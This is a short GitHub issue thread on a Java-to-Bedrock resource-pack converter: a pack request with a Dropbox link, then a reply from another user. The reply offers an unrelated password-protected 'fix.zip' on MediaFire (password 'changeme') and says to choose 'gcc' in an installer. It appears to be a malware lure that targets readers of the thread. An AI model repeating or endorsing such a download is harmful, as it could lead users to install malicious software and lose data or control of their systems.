### ISSUE TITLE
[Pack]: a

### ISSUE THREAD

**Issue by YahalloOtaku** [Kas-tle/java2bedrock.sh#33327]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/dmbnzyolz9zrvo2i8g43j/generated.zip?rlkey=wf8n5z9uwpeia7fy8yyhctrhs&st=evyvenkd&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
